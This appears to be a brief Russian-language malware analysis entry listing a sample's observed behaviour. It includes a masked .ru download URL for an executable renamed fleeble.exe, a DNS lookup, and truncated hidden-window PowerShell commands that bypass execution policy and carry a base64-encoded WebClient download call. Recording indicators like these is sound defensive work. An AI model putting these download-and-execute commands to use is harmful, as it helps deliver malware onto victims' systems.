Техническая информация
- http://www.wv###dicine.ru/1/p2.exe как fleeble.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -ep bypass -noni -w hidden -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8...
- DNS ASK wv###dicine.ru
- '<SYSTEM32>\cmd.exe' /c powershell.exe -ep bypass -noni -w hidden -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8...' (со скрытым окном)